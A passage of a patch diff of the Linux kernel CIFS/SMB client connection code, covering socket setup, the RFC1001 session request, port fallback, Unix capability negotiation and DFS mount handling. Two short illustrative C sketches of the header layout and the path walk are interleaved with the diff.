+-	smb_buf->smb_buf_length = cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | len);
+-	rc = smb_send(server, smb_buf, len);
+-	/*
+-	 * The RFC1001 layer in at least one server requires a very short
+-	 * break before negprot, presumably because it does not expect
+-	 * negprot to follow so fast. This is a simple solution that works
+-	 * without complicating the code and causes no significant slowdown
+-	 * on mount for everyone else.
+-	 */
+-	usleep_range(1000, 2000);
+-
+-	return rc;
+-}
+-
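/*
 * A sketch of the 4-byte header that ip_rfc1001_connect() above builds
 * via cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | len): byte 0 is the
 * frame type (0x81 for a session request), and the remaining big-endian
 * bytes carry the length of everything after the header. Illustrative
 * only; for trailers under 64 KiB the middle byte doubles as the flags
 * field and stays zero.
 */
#include <stdint.h>

void rfc1002_header(uint8_t hdr[4], uint8_t type, uint16_t trailer_len)
{
	hdr[0] = type;				/* 0x81 = session request */
	hdr[1] = 0;				/* flags / length extension */
	hdr[2] = (uint8_t)(trailer_len >> 8);	/* length, high byte */
	hdr[3] = (uint8_t)trailer_len;		/* length, low byte */
}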
+-static int
+-generic_ip_connect(struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	__be16 sport;
+-	int slen, sfamily;
+-	struct socket *socket = server->ssocket;
+-	struct sockaddr *saddr;
+-
+-	saddr = (struct sockaddr *) &server->dstaddr;
+-
+-	if (server->dstaddr.ss_family == AF_INET6) {
+-		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&server->dstaddr;
+-
+-		sport = ipv6->sin6_port;
+-		slen = sizeof(struct sockaddr_in6);
+-		sfamily = AF_INET6;
+-		cifs_dbg(FYI, "%s: connecting to [%pI6]:%d\n", __func__, &ipv6->sin6_addr,
+-				ntohs(sport));
+-	} else {
+-		struct sockaddr_in *ipv4 = (struct sockaddr_in *)&server->dstaddr;
+-
+-		sport = ipv4->sin_port;
+-		slen = sizeof(struct sockaddr_in);
+-		sfamily = AF_INET;
+-		cifs_dbg(FYI, "%s: connecting to %pI4:%d\n", __func__, &ipv4->sin_addr,
+-				ntohs(sport));
+-	}
+-
+-	if (socket == NULL) {
+-		rc = __sock_create(cifs_net_ns(server), sfamily, SOCK_STREAM,
+-				   IPPROTO_TCP, &socket, 1);
+-		if (rc < 0) {
+-			cifs_server_dbg(VFS, "Error %d creating socket\n", rc);
+-			server->ssocket = NULL;
+-			return rc;
+-		}
+-
+-		/* BB other socket options to set KEEPALIVE, NODELAY? */
+-		cifs_dbg(FYI, "Socket created\n");
+-		server->ssocket = socket;
+-		socket->sk->sk_allocation = GFP_NOFS;
+-		if (sfamily == AF_INET6)
+-			cifs_reclassify_socket6(socket);
+-		else
+-			cifs_reclassify_socket4(socket);
+-	}
+-
+-	rc = bind_socket(server);
+-	if (rc < 0)
+-		return rc;
+-
+-	/*
+-	 * Eventually check for other socket options to change from
+-	 * the default. sock_setsockopt is not used because it expects
+-	 * a user space buffer.
+-	 */
+-	socket->sk->sk_rcvtimeo = 7 * HZ;
+-	socket->sk->sk_sndtimeo = 5 * HZ;
+-
+-	/* make the bufsizes depend on wsize/rsize and max requests */
+-	if (server->noautotune) {
+-		if (socket->sk->sk_sndbuf < (200 * 1024))
+-			socket->sk->sk_sndbuf = 200 * 1024;
+-		if (socket->sk->sk_rcvbuf < (140 * 1024))
+-			socket->sk->sk_rcvbuf = 140 * 1024;
+-	}
+-
+-	if (server->tcp_nodelay)
+-		tcp_sock_set_nodelay(socket->sk);
+-
+-	cifs_dbg(FYI, "sndbuf %d rcvbuf %d rcvtimeo 0x%lx\n",
+-		 socket->sk->sk_sndbuf,
+-		 socket->sk->sk_rcvbuf, socket->sk->sk_rcvtimeo);
+-
+-	rc = socket->ops->connect(socket, saddr, slen,
+-				  server->noblockcnt ? O_NONBLOCK : 0);
+-	/*
+-	 * When mounting SMB root file systems, we do not want to block in
+-	 * connect. Otherwise bail out and then let cifs_reconnect() perform
+-	 * reconnect failover - if possible.
+-	 */
+-	if (server->noblockcnt && rc == -EINPROGRESS)
+-		rc = 0;
+-	if (rc < 0) {
+-		cifs_dbg(FYI, "Error %d connecting to server\n", rc);
+-		trace_smb3_connect_err(server->hostname, server->conn_id, &server->dstaddr, rc);
+-		sock_release(socket);
+-		server->ssocket = NULL;
+-		return rc;
+-	}
+-	trace_smb3_connect_done(server->hostname, server->conn_id, &server->dstaddr);
+-	if (sport == htons(RFC1001_PORT))
+-		rc = ip_rfc1001_connect(server);
+-
+-	return rc;
+-}
+-
+-static int
+-ip_connect(struct TCP_Server_Info *server)
+-{
+-	__be16 *sport;
+-	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
+-	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
+-
+-	if (server->dstaddr.ss_family == AF_INET6)
+-		sport = &addr6->sin6_port;
+-	else
+-		sport = &addr->sin_port;
+-
+-	if (*sport == 0) {
+-		int rc;
+-
+-		/* try with 445 port at first */
+-		*sport = htons(CIFS_PORT);
+-
+-		rc = generic_ip_connect(server);
+-		if (rc >= 0)
+-			return rc;
+-
+-		/* if it failed, try with 139 port */
+-		*sport = htons(RFC1001_PORT);
+-	}
+-
+-	return generic_ip_connect(server);
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-void reset_cifs_unix_caps(unsigned int xid, struct cifs_tcon *tcon,
+-			  struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+-{
+-	/*
+-	 * If we are reconnecting, should we check whether any requested
+-	 * capabilities changed locally, e.g. via remount? We cannot do much
+-	 * about it here even if they have (and even if we could detect it
+-	 * by the following). Perhaps we could add a backpointer from the
+-	 * tcon to an array of superblocks, or - if we changed all mounts of
+-	 * the same share to share one superblock, as NFS does - keep only a
+-	 * single backpointer. What if we wanted to mount the server share
+-	 * twice, once with and once without posixacls or posix paths?
+-	 */
+-	__u64 saved_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-
+-	if (ctx && ctx->no_linux_ext) {
+-		tcon->fsUnixInfo.Capability = 0;
+-		tcon->unix_ext = 0; /* Unix Extensions disabled */
+-		cifs_dbg(FYI, "Linux protocol extensions disabled\n");
+-		return;
+-	} else if (ctx)
+-		tcon->unix_ext = 1; /* Unix Extensions supported */
+-
+-	if (!tcon->unix_ext) {
+-		cifs_dbg(FYI, "Unix extensions disabled so not set on reconnect\n");
+-		return;
+-	}
+-
+-	if (!CIFSSMBQFSUnixInfo(xid, tcon)) {
+-		__u64 cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-		cifs_dbg(FYI, "unix caps which server supports %lld\n", cap);
+-		/*
+-		 * check for reconnect case in which we do not
+-		 * want to change the mount behavior if we can avoid it
+-		 */
+-		if (ctx == NULL) {
+-			/*
+-			 * turn off POSIX ACL and PATHNAMES if not set
+-			 * originally at mount time
+-			 */
+-			if ((saved_cap & CIFS_UNIX_POSIX_ACL_CAP) == 0)
+-				cap &= ~CIFS_UNIX_POSIX_ACL_CAP;
+-			if ((saved_cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) == 0) {
+-				if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP)
+-					cifs_dbg(VFS, "POSIXPATH support change\n");
+-				cap &= ~CIFS_UNIX_POSIX_PATHNAMES_CAP;
+-			} else if ((cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) == 0) {
+-				cifs_dbg(VFS, "possible reconnect error\n");
+-				cifs_dbg(VFS, "server disabled POSIX path support\n");
+-			}
+-		}
+-
+-		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)
+-			cifs_dbg(VFS, "per-share encryption not supported yet\n");
+-
+-		cap &= CIFS_UNIX_CAP_MASK;
+-		if (ctx && ctx->no_psx_acl)
+-			cap &= ~CIFS_UNIX_POSIX_ACL_CAP;
+-		else if (CIFS_UNIX_POSIX_ACL_CAP & cap) {
+-			cifs_dbg(FYI, "negotiated posix acl support\n");
+-			if (cifs_sb)
+-				cifs_sb->mnt_cifs_flags |=
+-					CIFS_MOUNT_POSIXACL;
+-		}
+-
+-		if (ctx && ctx->posix_paths == 0)
+-			cap &= ~CIFS_UNIX_POSIX_PATHNAMES_CAP;
+-		else if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) {
+-			cifs_dbg(FYI, "negotiate posix pathnames\n");
+-			if (cifs_sb)
+-				cifs_sb->mnt_cifs_flags |=
+-					CIFS_MOUNT_POSIX_PATHS;
+-		}
+-
+-		cifs_dbg(FYI, "Negotiate caps 0x%x\n", (int)cap);
+-#ifdef CONFIG_CIFS_DEBUG2
+-		if (cap & CIFS_UNIX_FCNTL_CAP)
+-			cifs_dbg(FYI, "FCNTL cap\n");
+-		if (cap & CIFS_UNIX_EXTATTR_CAP)
+-			cifs_dbg(FYI, "EXTATTR cap\n");
+-		if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP)
+-			cifs_dbg(FYI, "POSIX path cap\n");
+-		if (cap & CIFS_UNIX_XATTR_CAP)
+-			cifs_dbg(FYI, "XATTR cap\n");
+-		if (cap & CIFS_UNIX_POSIX_ACL_CAP)
+-			cifs_dbg(FYI, "POSIX ACL cap\n");
+-		if (cap & CIFS_UNIX_LARGE_READ_CAP)
+-			cifs_dbg(FYI, "very large read cap\n");
+-		if (cap & CIFS_UNIX_LARGE_WRITE_CAP)
+-			cifs_dbg(FYI, "very large write cap\n");
+-		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_CAP)
+-			cifs_dbg(FYI, "transport encryption cap\n");
+-		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)
+-			cifs_dbg(FYI, "mandatory transport encryption cap\n");
+-#endif /* CIFS_DEBUG2 */
+-		if (CIFSSMBSetFSUnixInfo(xid, tcon, cap)) {
+-			if (ctx == NULL)
+-				cifs_dbg(FYI, "resetting capabilities failed\n");
+-			else
+-				cifs_dbg(VFS, "Negotiating Unix capabilities with the server failed. Consider mounting with the Unix Extensions disabled if problems are found by specifying the nounix mount option.\n");
+-
+-		}
+-	}
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-int cifs_setup_cifs_sb(struct cifs_sb_info *cifs_sb)
+-{
+-	struct smb3_fs_context *ctx = cifs_sb->ctx;
+-
+-	INIT_DELAYED_WORK(&cifs_sb->prune_tlinks, cifs_prune_tlinks);
+-
+-	spin_lock_init(&cifs_sb->tlink_tree_lock);
+-	cifs_sb->tlink_tree = RB_ROOT;
+-
+-	cifs_dbg(FYI, "file mode: %04ho  dir mode: %04ho\n",
+-		 ctx->file_mode, ctx->dir_mode);
+-
+-	/* this is needed for ASCII cp to Unicode conversions */
+-	if (ctx->iocharset == NULL) {
+-		/* load_nls_default cannot return null */
+-		cifs_sb->local_nls = load_nls_default();
+-	} else {
+-		cifs_sb->local_nls = load_nls(ctx->iocharset);
+-		if (cifs_sb->local_nls == NULL) {
+-			cifs_dbg(VFS, "CIFS mount error: iocharset %s not found\n",
+-				 ctx->iocharset);
+-			return -ELIBACC;
+-		}
+-	}
+-	ctx->local_nls = cifs_sb->local_nls;
+-
+-	smb3_update_mnt_flags(cifs_sb);
+-
+-	if (ctx->direct_io)
+-		cifs_dbg(FYI, "mounting share using direct i/o\n");
+-	if (ctx->cache_ro) {
+-		cifs_dbg(VFS, "mounting share with read only caching. Ensure that the share will not be modified while in use.\n");
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_RO_CACHE;
+-	} else if (ctx->cache_rw) {
+-		cifs_dbg(VFS, "mounting share in single client RW caching mode. Ensure that no other systems will be accessing the share.\n");
+-		cifs_sb->mnt_cifs_flags |= (CIFS_MOUNT_RO_CACHE |
+-					    CIFS_MOUNT_RW_CACHE);
+-	}
+-
+-	if ((ctx->cifs_acl) && (ctx->dynperm))
+-		cifs_dbg(VFS, "mount option dynperm ignored if cifsacl mount option supported\n");
+-
+-	if (ctx->prepath) {
+-		cifs_sb->prepath = kstrdup(ctx->prepath, GFP_KERNEL);
+-		if (cifs_sb->prepath == NULL)
+-			return -ENOMEM;
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+-	}
+-
+-	return 0;
+-}
+-
+-/* Release all succeeded connections */
+-static inline void mount_put_conns(struct mount_ctx *mnt_ctx)
+-{
+-	int rc = 0;
+-
+-	if (mnt_ctx->tcon)
+-		cifs_put_tcon(mnt_ctx->tcon);
+-	else if (mnt_ctx->ses)
+-		cifs_put_smb_ses(mnt_ctx->ses);
+-	else if (mnt_ctx->server)
+-		cifs_put_tcp_session(mnt_ctx->server, 0);
+-	mnt_ctx->cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_POSIX_PATHS;
+-	free_xid(mnt_ctx->xid);
+-}
+-
+-/* Get connections for tcp, ses and tcon */
+-static int mount_get_conns(struct mount_ctx *mnt_ctx)
+-{
+-	int rc = 0;
+-	struct TCP_Server_Info *server = NULL;
+-	struct cifs_ses *ses = NULL;
+-	struct cifs_tcon *tcon = NULL;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	unsigned int xid;
+-
+-	xid = get_xid();
+-
+-	/* get a reference to a tcp session */
+-	server = cifs_get_tcp_session(ctx, NULL);
+-	if (IS_ERR(server)) {
+-		rc = PTR_ERR(server);
+-		server = NULL;
+-		goto out;
+-	}
+-
+-	/* get a reference to a SMB session */
+-	ses = cifs_get_smb_ses(server, ctx);
+-	if (IS_ERR(ses)) {
+-		rc = PTR_ERR(ses);
+-		ses = NULL;
+-		goto out;
+-	}
+-
+-	if ((ctx->persistent == true) && (!(ses->server->capabilities &
+-					    SMB2_GLOBAL_CAP_PERSISTENT_HANDLES))) {
+-		cifs_server_dbg(VFS, "persistent handles not supported by server\n");
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	/* search for existing tcon to this server share */
+-	tcon = cifs_get_tcon(ses, ctx);
+-	if (IS_ERR(tcon)) {
+-		rc = PTR_ERR(tcon);
+-		tcon = NULL;
+-		goto out;
+-	}
+-
+-	/* if new SMB3.11 POSIX extensions are supported do not remap / and \ */
+-	if (tcon->posix_extensions)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_POSIX_PATHS;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	/* tell server which Unix caps we support */
+-	if (cap_unix(tcon->ses)) {
+-		/*
+-		 * The caps reset checks the mount to see if unix extensions
+-		 * were disabled for just this mount.
+-		 */
+-		reset_cifs_unix_caps(xid, tcon, cifs_sb, ctx);
+-		spin_lock(&tcon->ses->server->srv_lock);
+-		if ((tcon->ses->server->tcpStatus == CifsNeedReconnect) &&
+-		    (le64_to_cpu(tcon->fsUnixInfo.Capability) &
+-		     CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)) {
+-			spin_unlock(&tcon->ses->server->srv_lock);
+-			rc = -EACCES;
+-			goto out;
+-		}
+-		spin_unlock(&tcon->ses->server->srv_lock);
+-	} else
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		tcon->unix_ext = 0; /* server does not support them */
+-
+-	/* do not care if the following call succeeds - informational */
+-	if (!tcon->pipe && server->ops->qfs_tcon) {
+-		server->ops->qfs_tcon(xid, tcon, cifs_sb);
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE) {
+-			if (tcon->fsDevInfo.DeviceCharacteristics &
+-			    cpu_to_le32(FILE_READ_ONLY_DEVICE))
+-				cifs_dbg(VFS, "mounted to read only share\n");
+-			else if ((cifs_sb->mnt_cifs_flags &
+-				  CIFS_MOUNT_RW_CACHE) == 0)
+-				cifs_dbg(VFS, "read only mount of RW share\n");
+-			/* no need to log a RW mount of a typical RW share */
+-		}
+-	}
+-
+-	/*
+-	 * Clamp the rsize/wsize mount arguments if they are too big for the server
+-	 * and set the rsize/wsize to the negotiated values if not passed in by
+-	 * the user on mount
+-	 */
+-	if ((cifs_sb->ctx->wsize == 0) ||
+-	    (cifs_sb->ctx->wsize > server->ops->negotiate_wsize(tcon, ctx)))
+-		cifs_sb->ctx->wsize = server->ops->negotiate_wsize(tcon, ctx);
+-	if ((cifs_sb->ctx->rsize == 0) ||
+-	    (cifs_sb->ctx->rsize > server->ops->negotiate_rsize(tcon, ctx)))
+-		cifs_sb->ctx->rsize = server->ops->negotiate_rsize(tcon, ctx);
+-
+-	/*
+-	 * The cookie is initialized from volume info returned above.
+-	 * Inside cifs_fscache_get_super_cookie it checks
+-	 * that we do not get the super cookie twice.
+-	 */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_FSCACHE)
+-		cifs_fscache_get_super_cookie(tcon);
+-
+-out:
+-	mnt_ctx->server = server;
+-	mnt_ctx->ses = ses;
+-	mnt_ctx->tcon = tcon;
+-	mnt_ctx->xid = xid;
+-
+-	return rc;
+-}
+-
+-static int mount_setup_tlink(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
+-			     struct cifs_tcon *tcon)
+-{
+-	struct tcon_link *tlink;
+-
+-	/* hang the tcon off of the superblock */
+-	tlink = kzalloc(sizeof(*tlink), GFP_KERNEL);
+-	if (tlink == NULL)
+-		return -ENOMEM;
+-
+-	tlink->tl_uid = ses->linux_uid;
+-	tlink->tl_tcon = tcon;
+-	tlink->tl_time = jiffies;
+-	set_bit(TCON_LINK_MASTER, &tlink->tl_flags);
+-	set_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
+-
+-	cifs_sb->master_tlink = tlink;
+-	spin_lock(&cifs_sb->tlink_tree_lock);
+-	tlink_rb_insert(&cifs_sb->tlink_tree, tlink);
+-	spin_unlock(&cifs_sb->tlink_tree_lock);
+-
+-	queue_delayed_work(cifsiod_wq, &cifs_sb->prune_tlinks,
+-				TLINK_IDLE_EXPIRE);
+-	return 0;
+-}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-/* Get unique dfs connections */
+-static int mount_get_dfs_conns(struct mount_ctx *mnt_ctx)
+-{
+-	int rc;
+-
+-	mnt_ctx->fs_ctx->nosharesock = true;
+-	rc = mount_get_conns(mnt_ctx);
+-	if (mnt_ctx->server) {
+-		cifs_dbg(FYI, "%s: marking tcp session as a dfs connection\n", __func__);
+-		spin_lock(&mnt_ctx->server->srv_lock);
+-		mnt_ctx->server->is_dfs_conn = true;
+-		spin_unlock(&mnt_ctx->server->srv_lock);
+-	}
+-	return rc;
+-}
+-
+-/*
+- * cifs_build_path_to_root returns full path to root when we do not have an
+- * existing connection (tcon)
+- */
+-static char *
+-build_unc_path_to_root(const struct smb3_fs_context *ctx,
+-		       const struct cifs_sb_info *cifs_sb, bool useppath)
+-{
+-	char *full_path, *pos;
+-	unsigned int pplen = useppath && ctx->prepath ?
+-		strlen(ctx->prepath) + 1 : 0;
+-	unsigned int unc_len = strnlen(ctx->UNC, MAX_TREE_SIZE + 1);
+-
+-	if (unc_len > MAX_TREE_SIZE)
+-		return ERR_PTR(-EINVAL);
+-
+-	full_path = kmalloc(unc_len + pplen + 1, GFP_KERNEL);
+-	if (full_path == NULL)
+-		return ERR_PTR(-ENOMEM);
+-
+-	memcpy(full_path, ctx->UNC, unc_len);
+-	pos = full_path + unc_len;
+-
+-	if (pplen) {
+-		*pos = CIFS_DIR_SEP(cifs_sb);
+-		memcpy(pos + 1, ctx->prepath, pplen);
+-		pos += pplen;
+-	}
+-
+-	*pos = '\0'; /* add trailing null */
+-	convert_delimiter(full_path, CIFS_DIR_SEP(cifs_sb));
+-	cifs_dbg(FYI, "%s: full_path=%s\n", __func__, full_path);
+-	return full_path;
+-}
+-
+-/*
+- * expand_dfs_referral - Update cifs_sb from dfs referral path
+- *
+- * cifs_sb->ctx->mount_options will be (re-)allocated to a string containing updated options for the
+- * submount.  Otherwise it will be left untouched.
+- */
+-static int expand_dfs_referral(struct mount_ctx *mnt_ctx, const char *full_path,
+-			       struct dfs_info3_param *referral)
+-{
+-	int rc;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	char *fake_devname = NULL, *mdata = NULL;
+-
+-	mdata = cifs_compose_mount_options(cifs_sb->ctx->mount_options, full_path + 1, referral,
+-					   &fake_devname);
+-	if (IS_ERR(mdata)) {
+-		rc = PTR_ERR(mdata);
+-		mdata = NULL;
+-	} else {
+-		/*
+-		 * We can not clear out the whole structure since we no longer have an explicit
+-		 * function to parse a mount-string. Instead we need to clear out the individual
+-		 * fields that are no longer valid.
+-		 */
+-		kfree(ctx->prepath);
+-		ctx->prepath = NULL;
+-		rc = cifs_setup_volume_info(ctx, mdata, fake_devname);
+-	}
+-	kfree(fake_devname);
+-	kfree(cifs_sb->ctx->mount_options);
+-	cifs_sb->ctx->mount_options = mdata;
+-
+-	return rc;
+-}
+-#endif
+-
+-/* TODO: all callers to this are broken. We are not parsing mount_options
+- * here; should we pass a clone of the original context instead?
+- */
+-int
+-cifs_setup_volume_info(struct smb3_fs_context *ctx, const char *mntopts, const char *devname)
+-{
+-	int rc;
+-
+-	if (devname) {
+-		cifs_dbg(FYI, "%s: devname=%s\n", __func__, devname);
+-		rc = smb3_parse_devname(devname, ctx);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: failed to parse %s: %d\n", __func__, devname, rc);
+-			return rc;
+-		}
+-	}
+-
+-	if (mntopts) {
+-		char *ip;
+-
+-		rc = smb3_parse_opt(mntopts, "ip", &ip);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: failed to parse ip options: %d\n", __func__, rc);
+-			return rc;
+-		}
+-
+-		rc = cifs_convert_address((struct sockaddr *)&ctx->dstaddr, ip, strlen(ip));
+-		kfree(ip);
+-		if (!rc) {
+-			cifs_dbg(VFS, "%s: failed to convert ip address\n", __func__);
+-			return -EINVAL;
+-		}
+-	}
+-
+-	if (ctx->nullauth) {
+-		cifs_dbg(FYI, "Anonymous login\n");
+-		kfree(ctx->username);
+-		ctx->username = NULL;
+-	} else if (ctx->username) {
+-		/* BB fixme parse for domain name here */
+-		cifs_dbg(FYI, "Username: %s\n", ctx->username);
+-	} else {
+-		cifs_dbg(VFS, "No username specified\n");
+-	/* In the userspace mount helper we can get the user name from
+-	   alternate locations such as env variables and files on disk */
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int
+-cifs_are_all_path_components_accessible(struct TCP_Server_Info *server,
+-					unsigned int xid,
+-					struct cifs_tcon *tcon,
+-					struct cifs_sb_info *cifs_sb,
+-					char *full_path,
+-					int added_treename)
+-{
+-	int rc;
+-	char *s;
+-	char sep, tmp;
+-	int skip = added_treename ? 1 : 0;
+-
+-	sep = CIFS_DIR_SEP(cifs_sb);
+-	s = full_path;
+-
+-	rc = server->ops->is_path_accessible(xid, tcon, cifs_sb, "");
+-	while (rc == 0) {
+-		/* skip separators */
+-		while (*s == sep)
+-			s++;
+-		if (!*s)
+-			break;
+-		/* next separator */
+-		while (*s && *s != sep)
+-			s++;
+-		/*
+-		 * if the treename is added, we then have to skip the first
+-		 * part within the separators
+-		 */
+-		if (skip) {
+-			skip = 0;
+-			continue;
+-		}
+-		/*
+-		 * temporarily null-terminate the path at the end of
+-		 * the current component
+-		 */
+-		tmp = *s;
+-		*s = 0;
+-		rc = server->ops->is_path_accessible(xid, tcon, cifs_sb,
+-						     full_path);
+-		*s = tmp;
+-	}
+-	return rc;
+-}
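
The loop above probes every intermediate directory by temporarily writing a NUL at each separator, calling is_path_accessible() on the prefix, and restoring the byte. A minimal userspace sketch of the same walk, with printf() standing in for the accessibility probe:

#include <stdio.h>

/* Visit each prefix of a separator-delimited path by temporarily
 * NUL-terminating it at the end of the current component. */
static void walk_components(char *path, char sep)
{
	char *s = path;

	while (*s) {
		while (*s == sep)		/* skip runs of separators */
			s++;
		if (!*s)
			break;
		while (*s && *s != sep)		/* find end of this component */
			s++;
		char tmp = *s;

		*s = '\0';
		printf("checking prefix: %s\n", path);	/* stand-in probe */
		*s = tmp;
	}
}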
+-
+-/*
+- * Check if path is remote (i.e. a DFS share).
+- *
+- * Return -EREMOTE if it is, otherwise 0 or -errno.
+- */
+-static int is_path_remote(struct mount_ctx *mnt_ctx)
+-{
+-	int rc;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct TCP_Server_Info *server = mnt_ctx->server;
+-	unsigned int xid = mnt_ctx->xid;
+-	struct cifs_tcon *tcon = mnt_ctx->tcon;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	char *full_path;
+-
+-	if (!server->ops->is_path_accessible)
+-		return -EOPNOTSUPP;
+-
+-	/*
+-	 * cifs_build_path_to_root works only when we have a valid tcon
+-	 */
+-	full_path = cifs_build_path_to_root(ctx, cifs_sb, tcon,
+-					    tcon->Flags & SMB_SHARE_IS_IN_DFS);
+-	if (full_path == NULL)
+-		return -ENOMEM;
+-
+-	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
+-
+-	rc = server->ops->is_path_accessible(xid, tcon, cifs_sb,
+-					     full_path);
+-	if (rc != 0 && rc != -EREMOTE)
+-		goto out;
+-
+-	if (rc != -EREMOTE) {
+-		rc = cifs_are_all_path_components_accessible(server, xid, tcon,
+-			cifs_sb, full_path, tcon->Flags & SMB_SHARE_IS_IN_DFS);
+-		if (rc != 0) {
+-			cifs_server_dbg(VFS, "cannot query dirs between root and final path, enabling CIFS_MOUNT_USE_PREFIX_PATH\n");
+-			cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+-			rc = 0;
+-		}
+-	}
+-
+-out:
+-	kfree(full_path);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-static void set_root_ses(struct mount_ctx *mnt_ctx)
+-{
+-	if (mnt_ctx->ses) {
+-		spin_lock(&cifs_tcp_ses_lock);
+-		mnt_ctx->ses->ses_count++;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		dfs_cache_add_refsrv_session(&mnt_ctx->mount_id, mnt_ctx->ses);
+-	}
+-	mnt_ctx->root_ses = mnt_ctx->ses;
+-}
+-
+-static int is_dfs_mount(struct mount_ctx *mnt_ctx, bool *isdfs, struct dfs_cache_tgt_list *root_tl)
+-{
+-	int rc;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-
+-	*isdfs = true;
+-
+-	rc = mount_get_conns(mnt_ctx);
+-	/*
+-	 * If called with the 'nodfs' mount option, then skip DFS resolving.  Otherwise
+-	 * unconditionally try to get a DFS referral (even cached) to determine whether it is a
+-	 * DFS mount.
+-	 *
+-	 * Skip prefix path to provide support for DFS referrals from w2k8 servers which don't seem
+-	 * to respond with PATH_NOT_COVERED to requests that include the prefix.
+-	 */
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
+-	    dfs_cache_find(mnt_ctx->xid, mnt_ctx->ses, cifs_sb->local_nls, cifs_remap(cifs_sb),
+-			   ctx->UNC + 1, NULL, root_tl)) {
+-		if (rc)
+-			return rc;
+-		/* Check if it is fully accessible and then mount it */
+-		rc = is_path_remote(mnt_ctx);
+-		if (!rc)
+-			*isdfs = false;
+-		else if (rc != -EREMOTE)
+-			return rc;
+-	}
+-	return 0;
+-}
+-
+-static int connect_dfs_target(struct mount_ctx *mnt_ctx, const char *full_path,
+-			      const char *ref_path, struct dfs_cache_tgt_iterator *tit)
+-{
+-	int rc;
+-	struct dfs_info3_param ref = {};
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	char *oldmnt = cifs_sb->ctx->mount_options;
+-
+-	cifs_dbg(FYI, "%s: full_path=%s ref_path=%s target=%s\n", __func__, full_path, ref_path,
+-		 dfs_cache_get_tgt_name(tit));
+-
+-	rc = dfs_cache_get_tgt_referral(ref_path, tit, &ref);
+-	if (rc)
+-		goto out;
+-
+-	rc = expand_dfs_referral(mnt_ctx, full_path, &ref);
+-	if (rc)
+-		goto out;
+-
+-	/* Connect to new target only if we were redirected (e.g. mount options changed) */
+-	if (oldmnt != cifs_sb->ctx->mount_options) {
+-		mount_put_conns(mnt_ctx);
+-		rc = mount_get_dfs_conns(mnt_ctx);
+-	}
+-	if (!rc) {
+-		if (cifs_is_referral_server(mnt_ctx->tcon, &ref))
+-			set_root_ses(mnt_ctx);
+-		rc = dfs_cache_update_tgthint(mnt_ctx->xid, mnt_ctx->root_ses, cifs_sb->local_nls,
+-					      cifs_remap(cifs_sb), ref_path, tit);
+-	}
+-
+-out:
+-	free_dfs_info_param(&ref);
+-	return rc;
+-}
+-
+-static int connect_dfs_root(struct mount_ctx *mnt_ctx, struct dfs_cache_tgt_list *root_tl)
+-{
+-	int rc;
+-	char *full_path;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	struct dfs_cache_tgt_iterator *tit;
+-
+-	/* Put the initial connections, as they might be shared with other mounts.  We need unique
+-	 * dfs connections per mount to fail over properly, so mount_get_dfs_conns() must be used from
+-	 * now on.
+-	 */
+-	mount_put_conns(mnt_ctx);
+-	mount_get_dfs_conns(mnt_ctx);
+-	set_root_ses(mnt_ctx);
+-
+-	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
+-	if (IS_ERR(full_path))
+-		return PTR_ERR(full_path);
+-
+-	mnt_ctx->origin_fullpath = dfs_cache_canonical_path(ctx->UNC, cifs_sb->local_nls,
+-							    cifs_remap(cifs_sb));
